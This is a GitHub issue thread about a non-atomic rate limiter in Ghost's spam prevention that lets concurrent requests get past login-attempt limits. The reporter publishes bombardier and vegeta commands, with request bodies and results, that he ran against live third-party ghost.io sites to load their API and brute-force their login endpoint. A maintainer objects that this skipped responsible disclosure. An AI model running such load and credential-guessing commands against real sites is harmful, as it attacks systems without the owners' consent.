### ISSUE TITLE
Spam prevention doesn't work well

### ISSUE THREAD

**Issue by animir** [TryGhost/Ghost#10422]
### Issue Summary

Spam prevention of endpoints (including private blogs) doesn't work well. `express-brute` package used for limiting requests allows to make thousands of requests on concurrent requests.
See this ticket https://github.com/AdamPflug/express-brute/issues/46

### To Reproduce

Make 1000 of concurrent requests to any limited endpoint described in this script https://github.com/TryGhost/Ghost/blob/9837df0b6fb481082a0bf8b35deaf8248f1d79e3/core/server/web/shared/middlewares/api/spam-prevention.js
It allows to make much more requests, than set with options.

**Comment by kevinansfield** [comment]
The spam prevention is good-enough for our threat models. Here's an example spamming the `/private/` endpoint with an invalid password under ideal conditions (local machine to local machine, local mysql, local nginx, etc):

```
❯ cat private-spam.yml 
config:
  target: 'http://ghost.blog/'
  phases:
    - duration: 1
      arrivalRate: 1000
scenarios:
  - flow:
    - post:
        url: '/private/'
        form:
          password: 'wrong

❯ artillery run private-spam.yml
...
All virtual users finished
Summary report @ 10:09:08(+0000) 2019-01-28
  Scenarios launched:  1000
  Scenarios completed: 903
  Requests completed:  903
  RPS sent: 78.62
  Request latency:
    min: 248.3
    max: 10353.3
    median: 6383.9
    p95: 10263.1
    p99: 10333.7
  Scenario counts:
    0: 1000 (100%)
  Codes:
    200: 55
    500: 848
  Errors:
    ECONNRESET: 73
    EPIPE: 24
```

This shows 45 successful requests outside of the allowed 10 but this is under _ideal_ conditions, it would be harder to coordinate the same number of concurrent requests in a real-world scenario.

The in-app brute force is also a last-line-of defence, if you're really worried then you should set up rate limiting at the web server or network level.

**Comment by animir** [comment]
@kevinansfield Thank you for example! 
That proves, that a hacker can brute-force passwords on user login endpoint as well. Not 5 fails, but 50 per hour. 1200 password per day. 36k passwords per month. Ghost authentication is vulnerable to slow brute-force attack.

It is quite simple to generate 10k, 50k and more concurrent requests. 1000 was just an example from the ticket. How many requests it would allow to make within an hour, if a hacker makes 10k requests roughly instantly? Why not use reliable package, which supports atomic increment?

Rate limiting on web server is a good advice. I agree with that. I am not sure many Ghost server admins really worried about that. Such issue is hard to notice, until web application users lose money or reputation.

**Comment by animir** [comment]
@kevinansfield Hi, I made a test on real ghost.io server from my laptop today.

1. Not sure, if `ghost.io` is microservices or monolith, so I decided to make requests to public APIs in purpose to overload event loop. It results to potentially longer duration between `get` and `set` methods of `brute-express` package, hence more non-atomic increments -> more login tries.

Here is a command which makes 750 concurrent requests during 60 seconds with maximum 1500 requests per second.
`./bombardier -c 750 -l -d 60s -r 1500 -t 10s "https://revolut-blog.ghost.io/ghost/api/v0.1/posts/?limit=all&client_id=ghost-frontend&client_secret=42a69a2615e1"`

2. I started another command from the same laptop to check client login limits at the same time.
100ms duration with 1000 requests per 10ms rate. Obviously, it is impossible to make a big number of real concurrent requests from one laptop, anyway, see results.

`animir$ vegeta attack -targets test.txt -duration 100ms -timeout 30s -output result.bin -rate 1000/10ms -workers 1000 -body body.txt`

test.txt
```
POST https://tinder.ghost.io/ghost/api/v0.1/authentication/token
Accept: application/json
Content-Type: application/x-www-form-urlencoded
```

body.txt
```
grant_type=password&username=test008654%40te.com&password=test&client_id=ghost-admin&client_secret=db552f959f60
```

Result
```
animir$ vegeta report -type=text result.bin 
Requests      [total, rate]            10000, 32156.82
Duration      [total, attack, wait]    35.316770495s, 310.976ms, 35.005794495s
Latencies     [mean, 50, 95, 99, max]  349.800338ms, 0s, 0s, 23.763276826s, 35.308768477s
Bytes In      [total, mean]            14072, 1.41
Bytes Out     [total, mean]            11000, 1.10
Success       [ratio]                  0.00%
Status Codes  [code:count]             0:9900  404:14  429:86  
```

I was able to make 14 login tries instead of 5 from usual laptop. 
Wonder, how many passwords hacker can brute-force with network of 100 servers.
Note, I didn't overload `ghost.io` servers, just sent some traffic there. If play with parameters, I'm pretty sure, overloaded event-loop would allow hundreds of passwords tries per hour.

Btw, I'm author of [rate-limiter-flexible](https://github.com/animir/node-rate-limiter-flexible) package, which does atomic increment and would never allow those.

**Comment by kevinansfield** [comment]
Hey @animir. First, we have a [proper way to disclose](https://github.com/TryGhost/Ghost/blob/master/SECURITY.md) security issues which hasn't been followed here. Second, it's really not cool to post commands in a public space that hit production sites which you don't own.

I'm moving this issue to our internal security repo where it will be re-assessed. If you have any further followup or security-related issues please follow our [security procedure](https://github.com/TryGhost/Ghost/blob/master/SECURITY.md). Thanks.
